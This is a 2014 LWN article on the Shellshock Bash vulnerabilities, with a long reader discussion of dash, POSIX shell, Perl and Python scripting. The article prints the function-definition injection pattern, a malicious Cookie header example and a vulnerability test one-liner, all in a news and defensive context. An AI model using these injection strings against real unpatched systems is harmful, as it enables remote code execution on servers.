Bash gets shellshocked
It's been a crazy week for the Bash shell, its maintainer, and many Linux distributions that use the shell. A remote code-execution vulnerability that was reported on September 24 has now morphed into multiple related vulnerabilities, which have now mostly been fixed and updates released by distributions. The vulnerabilities have been dubbed "Shellshock" and the technical (and mainstream) press has had a field day reporting on the incident. It all revolves around a somewhat dubious Bash feature, but the widespread use of Bash in places where it may not really make sense contributed to the severity of the bug.
First bug
The bug, which was evidently introduced into Bash in around 1992, (ab)uses the environment variable parsing code by adding extra commands after defining a function. It was not really common knowledge that you could even define a function by way of an environment variable. It is a little-used feature that was also, evidently, not strenuously tested. An attacker who could set an environment variable could do:
VAR=() { ignored; }; /bin/idThe result is a shell function named VAR, but that's not the most dangerous part. Because of a bug in the parser, Bash didn't stop processing the variable once the function was complete, so it would execute /bin/id every time the variable was parsed, which happens at Bash startup time.
Normally, just on general principles, one avoids giving attackers ways to set environment variables in shells. But, as it turns out, there are a number of ways for an attacker to do so. The easiest (and perhaps best known) way is to use the Common Gateway Interface (CGI) protocol. All CGI programs get invoked with certain environment variables set whose values are controlled by the client (e.g. REMOTE_HOST, SERVER_PROTOCOL, etc.). If Bash is invoked, either because the CGI program is a Bash script or through some other means, it will parse the environment variables and execute any code the attacker tacked on. Game over.
There may not be all that many Bash-specific CGI programs in the wild, but many Linux distributions (notably not Debian or Ubuntu) make exploiting the bug easier still: they link /bin/sh to Bash. So, any /bin/sh CGI scripts (of which there still probably aren't all that many) are vulnerable. More worryingly, CGI programs in any language that use the shell (e.g. via system(), popen(), or similar) may well be vulnerable.
Beyond CGI programs, there are a number of other possible vectors for attack. DHCP clients often invoke shell scripts for configuring the network and use environment variables to communicate to those scripts. Mail transfer agents (MTAs) may be affected; Exim and qmail are both vulnerable. Restricted OpenSSH logins (using the ForceCommand directive) can bypass the restrictions using Shellshock. And so on. Red Hat has compiled a list of some of the affected (and unaffected) programs.
Fixes
Michał Zalewski has a blog post from September 25 that describes the original bug along with the first patch. That patch worried Zalewski and others since it simply stopped the parsing once the function definition had been parsed; it would no longer execute code placed after the definition. But, as he pointed out, it still allowed an attacker to send a HTTP header like:
Cookie: () { echo "Hello world"; }The CGI program would then get an environment that contained a function called HTTP_COOKIE(). It is unlikely that such a function could be called by accident, "
but intuitively it's a pretty scary outcome".
As Zalewski described, that first patch was fragile because it made two assumptions about the Bash parser—both of which were later shown to be incorrect, as updates sprinkled throughout the post attest. He advocated Florian Weimer's approach, which puts the functions defined in environment variables into a different namespace by adding a prefix and suffix to the names. That should avoid allowing environment variables to be unknowingly set to functions by web servers and other programs.
Weimer's patch was eventually merged with a few tweaks (e.g. changing the suffix from "()" to "%%") by Bash maintainer Chet Ramey. So there is now an easy test to determine if a system is susceptible to the bugs:
$ foo='() { echo not patched; }' bash -c foo bash: foo: command not foundIf the output shows "not patched", rather than the above, Bash is still vulnerable. Zalewski's post from September 27 describes some of the additional parser bugs found that led Ramey to adopt the namespace approach.
Meanwhile, distributions have been a bit whipsawed: updating Bash, seeing more bug reports, and updating again. At this point, things have mostly settled down on that front. All that remains is for users to update their systems. Since both Debian and Ubuntu use the Debian Almquist shell (Debian ash or dash) for /bin/sh, there is likely far less risk of an exploit, though Bash should still be updated.
More changes may be coming. Christos Zoulas suggested that a flag be added to govern
importing functions through environment variables with a default to "off".
That is a change he has made for NetBSD's Bash: "It is not wise to
expose bash's
parser to the internet and then debug it live while being attacked.
"
Others have agreed that it would provide a stronger defense against other,
unknown flaws in the parser. Scripts that use the feature (which seem to
be few in number) could be changed to turn the feature on.
It should be noted that attacks are ongoing in the wild. For example, the LWN web logs are full of attempts to exploit the vulnerabilities.
While there is plenty to worry about with regard to Shellshock, some in the press have gone a little overboard. It is unlikely, for instance, that vast numbers of embedded Linux devices are vulnerable, medical-related or otherwise. The problem of embedded Linux devices that can't be updated is certainly real (and likely to bite us at some point), but Bash is not typically installed in the embedded world. Most are likely to be using BusyBox, which uses ash, so it is not vulnerable. Another large chunk of Linux devices, Android systems, use mksh (MirBSD Korn shell) rather than Bash.
Since Bash is a heavyweight shell, with a long startup time and high memory requirements, one might wonder why many Linux distributions make it the default shell for shell scripts. Debian and Ubuntu moved away from Bash for shell scripts for just those reasons. Slackware uses ash for its install scripts as well. These bugs may lead to a push to switch to a more minimal shell as the default for scripts in more distributions. This is likely not to be the last Bash vulnerability we see—especially now that security researchers (and attackers) are focused on it.
The "function definition via environment variable" feature seems to be of limited utility. Also, since it isn't all that well-known, it has largely escaped scrutiny until recently. Weimer mentioned that the feature appears to be used by test harnesses. The search he did in Debian's code repositories bears that out. While it may be tempting to disable the feature, as Ian Jackson tried, the namespace fix is backward compatible so existing users can continue to use it. Movement toward reducing or eliminating Bash for non-interactive uses throughout Debian (i.e. eliminating #!/bin/bash), though, seems to be picking up some steam.
Like with OpenSSL and Heartbleed, Shellshock has exposed a project that is both critical to many Linux systems and is not completely healthy. Diego Pettenò described the problem in a blog post. Bash has a single maintainer, with a somewhat cathedral-like development process, which led Pettenò and others to be concerned about the shell long before Shellshock. It would seem prudent for the Linux community to be on the lookout for these kinds of problems now that we have been bitten twice recently.
There are a number of programs that underlie a basic, functioning Linux system, but it is not entirely clear what that number is, nor what projects belong in that set. OpenSSL was an obvious member (though largely ignored until recently); Bash is less so, even though it is now clear that it is used in ways that can easily lead to system compromise. It is probably long past time that some kind of inventory of this "critical infrastructure" is done. Once the projects are identified, some kind of health assessment and/or security audit can be done. We can be sure that those kinds of assessments are being done, at least informally, by attackers and black hats—we just don't get the benefit of their analysis.
Index entries for this article | |
---|---|
Security | Bash |
Security | Vulnerabilities/Command injection |
Posted Oct 1, 2014 20:18 UTC (Wed)
by iabervon (subscriber, #722)
[Link]
Posted Oct 1, 2014 20:41 UTC (Wed)
by sjj (guest, #2020)
[Link]
Posted Oct 1, 2014 20:58 UTC (Wed)
by chutzpah (subscriber, #39595)
[Link] (33 responses)
Some minor investigation finds that mksh appears to be an alternative that supports a reasonable number of these sorts of these features, while still being relatively lightweight.
Posted Oct 1, 2014 21:04 UTC (Wed)
by josh (subscriber, #17465)
[Link] (2 responses)
Posted Oct 2, 2014 13:51 UTC (Thu)
by CChittleborough (subscriber, #60775)
[Link]
Posted Oct 2, 2014 14:52 UTC (Thu)
by gwolf (subscriber, #14632)
[Link]
$ diff -u <(cmd1) <(cmd2)
is way easier and clearer than
$ F1=`tempfile`
Of course, it makes sense to include this bashism in your scripts. And, of course, that'd make your scripts depend on bash.
Posted Oct 1, 2014 22:13 UTC (Wed)
by wahern (subscriber, #37304)
[Link] (23 responses)
There are various ways to handle lists of things in the POSIX syntax. One lesser-known way is by using the "set -- [...]" construct, which resets your local argument vector. A more common method is using read(1).
Many times people use Bash-specific features simply because they don't understand or care about POSIX syntax. I'd love to see a count of hands of shell programmers who have ever read the POSIX documentation for the shell. See http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html. The framed version is much easier to read: http://pubs.opengroup.org/onlinepubs/9699919799/
But as josh said, if you're writing software that really requires juggling lots of data, why keep the shell? Why not just switch to Perl, for example? I'd be surprised if Perl wasn't installed by default on at least as many vendor platforms as Bash. Unless your goal is sheer portability or simplicity, using the shell doesn't make any sense.
Bash in particular is hardly more light-weight than Perl. The Bash and Perl interpreters are comparable in size. Compare them to dash.
Posted Oct 1, 2014 22:36 UTC (Wed)
by Jandar (subscriber, #85683)
[Link] (5 responses)
One global array is hardly a replacement for the bash arrays. Btw the set builtin is well-known.
> A more common method is using read(1).
Do you mean managing arrays in multiple tempfiles and reading (+ writing with ugly escapes) on any usage? Appalling.
The omission of arrays in posix-shell is the major reason for me to ignore it and use bash.
Posted Oct 2, 2014 14:23 UTC (Thu)
by nix (subscriber, #2304)
[Link] (3 responses)
Posted Oct 3, 2014 9:48 UTC (Fri)
by Jandar (subscriber, #85683)
[Link] (2 responses)
typeset -a Options Files
How do you prepare (with correct quoting) a dynamic argument-vector without arrays? All other methods are ugly and error-prone beyond any acceptable limit.
Posted Oct 17, 2014 11:12 UTC (Fri)
by mgedmin (subscriber, #34497)
[Link] (1 responses)
paths[${#paths[*]}]="$1"
Rewriting this to use +=() will make my scripts a bit saner.
Posted Oct 17, 2014 12:02 UTC (Fri)
by mathstuf (subscriber, #69389)
[Link]
Posted Oct 3, 2014 19:30 UTC (Fri)
by wahern (subscriber, #37304)
[Link]
foo() {
printf "$# -> $*\n"
printf "$# -> $*\n"
Also, per POSIX: "Positional parameters are initially assigned when the shell is invoked (see sh), temporarily replaced when a shell function is invoked (see Function Definition Command), and can be reassigned with the set special built-in command."
Obviously this isn't a complete substitute for arrays, neither alone nor in tandem with other alternatives.
But my point is that people use Bash features without understanding the alternatives, and without appreciating the cost of Bash. Bash is a great interactive shell. But if you're serious about shell programming, one should learn POSIX syntax, as well as sed(1), awk(1), and the nuances of other utilities. This isn't hard because the POSIX documentation is infinitely more clear and concise than implementation documentation. A good way to practice is with Solaris, because Solaris' utilities are often annoyingly anachronistic (e.g. grep doesn't even have a recursive mode), but dash isn't a bad place to start, either. And when you do choose to use extended functionality, do so knowingly, having assessed the costs and benefits.
Posted Oct 1, 2014 23:16 UTC (Wed)
by SEJeff (guest, #51588)
[Link]
Posted Oct 2, 2014 8:31 UTC (Thu)
by ibukanov (subscriber, #3942)
[Link] (11 responses)
Perl is not particularly safer with syntax that is similar in complexity to Bash. Besides, the shellshock comes not from the syntax but from a badly designed Bash feature that could be provided for "convenience" just as well in Perl or Python or JavaScript under node.js.
Posted Oct 2, 2014 9:41 UTC (Thu)
by niner (subscriber, #26151)
[Link] (7 responses)
So I'd argue that it is much easier to program safely in Perl than in Bash.
Posted Oct 2, 2014 15:54 UTC (Thu)
by ibukanov (subscriber, #3942)
[Link] (6 responses)
I want to repeat that Shellshock has nothing to do with programming style of Bash scripts. It comes from a badly designed and implemented feature of the Bash interpreter that is written in C. Perl runtime could just as easily provide a similar "feature" affecting any Perl script, strict or not. For example, can you with certainty assert that Perl interpreter has no bugs related to reading of environment variables that could trigger execution of arbitrary Perl code?
Posted Oct 2, 2014 17:31 UTC (Thu)
by dskoll (subscriber, #1630)
[Link] (3 responses)
Perl runtime could just as easily provide a similar "feature" affecting any Perl script, strict or not.
But it doesn't. Well, with one exception: Setting PERL5DB will make perl execute arbitrary Perl code, but only if it has been invoked with the "-d" command-line flag which says to run under a debugger, and no Perl script uses that flag.
Perl makes environment variables available in the %ENV hash, but certainly doesn't try to interpret them as Perl code (modulo the single exception above.)
Posted Oct 5, 2014 20:15 UTC (Sun)
by alankila (guest, #47141)
[Link] (2 responses)
Thankfully, none of this is even close to as bad as what bash did.
Posted Oct 7, 2014 14:35 UTC (Tue)
by dskoll (subscriber, #1630)
[Link] (1 responses)
PERL5LIB and PERL5INC are not used in taint mode. Bash really needs a taint mode.
Posted Oct 7, 2014 17:31 UTC (Tue)
by mathstuf (subscriber, #69389)
[Link]
Posted Oct 2, 2014 21:25 UTC (Thu)
by flussence (guest, #85566)
[Link] (1 responses)
It's had that feature for decades: 2-arg open() will happily interpret any filename passed to it containing a "|" prefix or suffix to mean a command pipe, and helpfully give the rest of the string to the shell to run. The same function is also used internally to pass filenames in ARGV into the magic <> line-iterator.
Posted Oct 3, 2014 11:23 UTC (Fri)
by dskoll (subscriber, #1630)
[Link]
2-arg open() will happily interpret any filename passed to it containing a "|" prefix or suffix
That's a little different from the bash bug. It requires the programmer to write a script that doesn't handle user-input safely. It's also stopped in taint mode.
The Bash bug doesn't require any action on the part of the script writer; it happens before your script even has a chance to do anything.
Posted Oct 2, 2014 14:59 UTC (Thu)
by gwolf (subscriber, #14632)
[Link] (1 responses)
I do argue (see my above comment) for the utility of some sorts of bashisms, particularly those that help forked process' control and quoting (another favorite of mine is to use $() instead of ``, as it's *way* clearer. I won't argue for using Bash when you use arrays and local scopes — That's a clear indication you should switch to a real programming language. One that, between many other things, separates parsing/compiling from executing, because your program will most likely be complex enough to warrant it!
But yes, people complain about Perl being write-only. Bash constructs and mindset are way worse than Perl.
Posted Oct 2, 2014 15:38 UTC (Thu)
by madscientist (subscriber, #16861)
[Link]
As others have pointed out, if you want to write bash scripts that's fine and it's trivial to do: just start your script with #!/bin/bash. If you want to write POSIX shell scripts, start your script with #!/bin/sh. If you use #!/bin/sh and you use bash-isms, your script is simply wrong.
Posted Oct 9, 2014 11:30 UTC (Thu)
by ssokolow (guest, #94568)
[Link]
That sort of thing is why I encourage friends who are launching child processes to do their scripting in Python using the subprocess module. They really did a great job on designing its API... especially when paired with various other modules already part of stdlib. Apparently someone's also ported it to ruby though, unfortunately, it's not part of stdlib there and I don't know whether shlex is also available. Plus, of course, convenience functions like
Posted Oct 2, 2014 13:49 UTC (Thu)
by mbunkus (subscriber, #87248)
[Link] (3 responses)
As much as I love and use Perl it doesn't have several things that I find extremely useful for scripting: set -e, set -x and zsh's globbing functionality. I don't know of an equivalent for either of the »set«s, and especially -e is truly a very effective way of preventing accidental mishaps.
Then again: for me it's a question of when to switch from zsh to Perl, not from bash to Perl. zsh can do a lot of things that bash cannot, therefore I do get further via shell scripts than I would with bash; meaning the gain of switching from bash to Perl is usually higher than for zsh to Perl.
Posted Oct 3, 2014 9:42 UTC (Fri)
by cortana (subscriber, #24596)
[Link] (2 responses)
Posted Oct 1, 2014 22:25 UTC (Wed)
by debacle (subscriber, #7114)
[Link]
Posted Oct 2, 2014 6:05 UTC (Thu)
by Karellen (subscriber, #67644)
[Link]
Posted Oct 2, 2014 6:19 UTC (Thu)
by ptman (subscriber, #57271)
[Link]
Posted Oct 2, 2014 11:00 UTC (Thu)
by eru (subscriber, #2753)
[Link]
Posted Oct 4, 2014 7:03 UTC (Sat)
by tomgj (guest, #50537)
[Link] (1 responses)
Posted Oct 9, 2014 10:59 UTC (Thu)
by Tet (guest, #5433)
[Link]
Posted Oct 2, 2014 0:05 UTC (Thu)
by pabs (subscriber, #43278)
[Link] (3 responses)
http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservatio...
Posted Oct 2, 2014 18:32 UTC (Thu)
by drag (guest, #31333)
[Link] (2 responses)
Posted Oct 2, 2014 18:41 UTC (Thu)
by dlang (guest, #313)
[Link] (1 responses)
Posted Oct 23, 2014 8:08 UTC (Thu)
by pabs (subscriber, #43278)
[Link]
Posted Oct 2, 2014 7:50 UTC (Thu)
by andreashappe (subscriber, #4810)
[Link] (1 responses)
Posted Oct 2, 2014 8:56 UTC (Thu)
by dtlin (subscriber, #36537)
[Link]
I don't know whether security was among the motivations, but the systemd suite consistently avoids shelling out. Everything is done by stuff like libraries in-process, D-Bus calls, or direct exec of another binary; I believe it's possible to boot a system without /bin/sh at all? Also systemd launches everything with a clean environment.
Commands specified in unit files (e.g. ExecStart=...) just get word-splitting and some substitutions made, no shell processing. I believe the same is true for udev rules and RUN+="..." but it seems a little more complex.
In practical terms, most of these things probably aren't attackable, with the exception of systemd-networkd whose developer got to boast a bit noting that its in-process DHCP client is unaffected Shellshock (unlike dhclient and dhcpcd).
Posted Oct 2, 2014 11:54 UTC (Thu)
by Siosm (subscriber, #86882)
[Link] (2 responses)
Posted Oct 3, 2014 9:39 UTC (Fri)
by cortana (subscriber, #24596)
[Link] (1 responses)
Posted Oct 3, 2014 9:52 UTC (Fri)
by Siosm (subscriber, #86882)
[Link]
I'm definitely not pro-bash, nor anti-dash, but switching shells because one vulnerability was found is "fear driven security".
Posted Oct 2, 2014 14:43 UTC (Thu)
by CChittleborough (subscriber, #60775)
[Link] (1 responses)
Fixing all these bugs is likely to make this code even more complex. For example, exported shell functions now use a new mode in which the parser stops after one command. Sigh.
Posted Oct 2, 2014 23:58 UTC (Thu)
by giraffedata (guest, #1954)
[Link]
It also explains how a Bash change is able to provide the namespace fix (adding a prefix and suffix to the environment variable name when it contains a function): Bash is at both ends of the interface.
There's an interesting discussion of finding more parser bugs, including one that the discoverer didn't understand, here. In short, making sure that bash doesn't try to parse untrusted content seems to be the only safe thing to do.
Bash gets shellshocked
Bash gets shellshocked
dash/ash
dash/ash
Bash can be a big win for many scripts
Useful bashisms
$ F2=`tempfile`
$ cmd1 > $F1 &
$ cmd2 > $F2 &
$ diff -u $F1 $F2
$ rm $F1 $F2
dash/ash
$ ls -sh /bin/bash
1000K /bin/bash
$ ls -sh /usr/bin/perl /usr/lib/libperl.so.5.18.2
12K /usr/bin/perl 1.6M /usr/lib/libperl.so.5.18.2
$ ls -sh /bin/dash
120K /bin/dash
And, no, bash is not statically linked in the above. Assuming all the developers of those projects are equally good programmers, how many bugs do you think lurk in bash compared to dash? Are arrays really worth all that code surface? Perl might be bigger, but I'd bet Perl has fewer bugs just because the language grammar is simpler and more regular--go figure. And, yes, using the shell is fraught with quoting problems. Historically that was not only because the shell syntax mixes code and data in subtle ways, but because the shells themselves often had parsers which caused unexpected behavior (sometimes a bug, sometimes a "feature"). Using Bash features may address the former to some small extent, but it certainly doesn't address the latter.
dash/ash
dash/ash
dash/ash
Options+=("$option1")
Files+=("$file1")
$UseVerbose && Options+=("-v")
$UseSecondFile && Files+=("$file2")
command "${Options[@]}" -- "${Files[@]}"
dash/ash
dash/ash
dash/ash
set -- A B C
}
set -- 1 2 3 4
foo
printf "$# -> $*\n"
dash/ash
dash/ash
dash/ash
Perl does not mix program code with data.
Perl has a taint mode that catches many cases of missing input sanitation.
Perl's system() function only ever invokes /bin/sh if the given command contains shell metacharacters and supports the system PROGRAM LIST form that never ever invokes a shell (it uses exec()) at all and avoids many errors with missing parameter quoting.
dash/ash
dash/ash
dash/ash
dash/ash
Bash needs an overlay:
dash/ash
_____________________________________________
/ It looks like your script is over 100 lines \
\ long; did you mean to write this in Perl? /
---------------------------------------------
\
\
.::!!!!!!!:.
.!!!!!:. .:!!!!!!!!!!!!
~~~~!!!!!!. .:!!!!!!!!!UWWW$$$
:$$NWX!!: .:!!!!!!XUWW$$$$$$$$$P
$$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$#
$$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$*
^$$$B $$$$\ $$$$$$$$$$$$ d$$R"
"*$bd$$$$ '*$$$$$$$$$$$o+#"
"""" """""""
dash/ash
dash/ash
Bash and Perl
Bash and Perl
dash/ash
shell=True
shlex.split()
, os.path.expanduser()
, fnmatch.filter()
, glob.glob()
modules from the Python standard library.env
argument makes it easy to call a subprocess with a sanitized environment.cwd
argument avoids the need for cd
ing in os.system()
or doing an os.getcwd() os.chdir()
dance.subprocess.call()
, subprocess.check_call()
, and subprocess.check_output()
integrate nicely with the mix of try
/except
/finally
and os.walk()
I already recommend for that sort of scripting.dash/ash
dash/ash
Either I write dash or I use Python
dash/ash
dash/ash
Adding a selection of the more scripting-friendly bashisms to dash might not bloat it. For example, the array feature looks simple: one-dimensional only, integer indices, and dash already supports evaluating integer expressions in the context of $((expr)) expansion. Of course, identifying which are the most useful extensions (without taking all bash features) is a problem.
dash/ash
dash/ash
The thing about moving to dash or ash for shell scripts is that some of the "bashisms" are truly useful features.
Okay but that doesn't mean that "sh" needs to be bash. The scripts that require bashisms can use bash explicitly by name, leaving sh to be a more minimal implementation of the POSIX shell.
dash/ash
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Bash gets shellshocked
Why does Bash parse certain environment variables on startup? Like all POSIX shells, Bash has an export -f
export
command which puts the specified shell variables into the environment of subsequently-executed commands. But Bash also has a -f
option to export
which exports shell functions instead of shell variables. For example:
# hello() { echo "Hello, CLI user"; }
# export -f hello
# bash
## hello
Hello, CLI user
## env | grep -A1 Hello,
hello=() { echo Hello, CLI user
}
The other thing going on here is that the Bash parser uses a yacc grammar whose input is specified by static variables. To execute a Bash script file, Bash gets the parser to read from that file then return to its previous source of input. A Bash function is stored as a string and executed by getting the parser to read the string. The code that switches parser input around like this is not all that easy to understand. (I speak from experience.)
Thanks. That really does explain the feature; no other description I've seen of the little-known function-in-environment-variable feature mentions that it's for export -f . What looked like a bizarre feature now looks fairly natural.
export -f